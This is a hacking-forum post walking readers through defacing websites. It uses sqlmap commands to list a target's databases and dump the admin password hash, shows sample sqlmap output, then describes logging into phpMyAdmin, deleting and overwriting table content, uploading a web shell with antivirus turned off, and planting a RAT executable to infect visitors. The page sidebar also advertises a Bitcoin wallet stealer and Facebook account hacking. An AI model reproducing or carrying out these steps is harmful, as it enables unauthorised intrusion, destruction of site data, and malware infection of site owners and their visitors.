www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» BitCoin Wallet stealor New
Sun Feb 19, 2017 7:52 pm by jammieban

» The Omega Organisation is looking for members
Sun Feb 19, 2017 5:50 pm by TheOmegaOrg

» Hack any Facebook Account for Free
Thu Feb 16, 2017 2:25 pm by Admin

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Sun Feb 12, 2017 12:13 pm by Shan Soomro 51

» Hallmarks of Scientific Research
Fri Feb 10, 2017 4:04 pm by Nomi gee

» Hotspot Shield Elite VPN [Latest]
Sun Jan 29, 2017 11:52 am by Admin

» CCleaner Professional Plus [Latest]
Sun Jan 29, 2017 9:32 am by harry756

» SQL Dumper v.8.0
Fri Jan 13, 2017 10:18 pm by imsopickled

» Infographic Resume/CV Pack
Fri Jan 06, 2017 2:55 pm by Admin

February 2017

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728     

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


SQLMap/SQLi Dumper Deface

Share

Admin
Admin

Posts : 472
Reputation : 7
Join date : 2014-12-10
Age : 24
Location : Pakistan

SQLMap/SQLi Dumper Deface

Post by Admin on Fri Mar 06, 2015 4:41 pm

Requirements:

1337 Admin Finder: [You must be registered and logged in to see this link.]
SQLMap:
[You must be registered and logged in to see this link.]
Python 2.7:
[You must be registered and logged in to see this link.]


Okay open cmd and go to your SQLMap directory:

then enter this command:

CODE:
sqlmap.py -u [You must be registered and logged in  to see this link.] --dbs



Then be patient it will complete.....


Then we need the user name and password for phpmyadmin

CODE:
sqlmap.py -u [You must be registered and logged in  to see this link.] --current-user --password




Hash smh okay now we need to decrypt the password hash By using [You must be registered and logged in to see this link.]

then it should spill out the password after being decrypt!!! <3
now go to there address

CODE:
[You must be registered and logged in  to see this link.]



Now congratz you logged on to there database
Now go to there database which is called

CODE:
[19:37:09] [INFO] fetching database names
[19:37:09] [INFO] the SQL query used returns 5 entries
[19:37:09] [INFO] resumed: information_schema
[19:37:09] [INFO] resumed: mysql
[19:37:09] [INFO] resumed: performance_schema
[19:37:09] [INFO] resumed: praqua
[19:37:09] [INFO] resumed: rgweb
available databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] praqua[*] rgweb <-------------------


I'll tell you how i manage to find thats the web site database its using i am on SQLi Dumper

then the database links up with the site using....

click on news cause news is always on the site for automatically insert and update the website.
LEAVE ATLEAST ON COLUMN! Then delete the rest.....
then we edit the one we left..
title can be what ever you want BUT THE MAIN IMPORTANT PART IS MAKE/GET A DEFACE SCREENSHOT IT WITH ALT+ PRNT SCRN AND UPLOAD IT ON A PHOTO SHARE SITE!!!
should be like that ^.^
now that is less damage then you think to make it noticeable lets go to Tender table!!!


LEAVE ATLEAST ON COLUMN! Then delete the rest.....
then we edit the one we left..

we do the samething BUT! in the title box cause its big put your deface code!

better img code cause you can resize it!
now lets use our Admin Finder Python.

now lets go to the link and we have the password of the admin.

now to spread your r.a.t virus upload it and click Save!<3

OR Upload Shell to really add your Deface<3!<3 [You must be registered and logged in to see this link.]
ANTIVIRUS WILL DETECT IT AS A BACKDOOR DISABLE IT!
Then there you go to the url: [You must be registered and logged in to see this link.]

then do the basic things you usually do on file manager
i recommand using SimAttack cause that one i am using is a fail and also they detect c99 and wont let you upload it. so SemiAttack

CODE:
[You must be registered and logged in  to see this link.]


Wala there its complete [You must be registered and logged in to see this link.]
To automatically rat the victum go the SimAttacker and go to cmd enter this code

CODE:
ex:- C:\Program Files (x86)\Zend\Apache2\htdocs\Tenders\Fakey.exe  




    Current date/time is Thu Feb 23, 2017 9:46 pm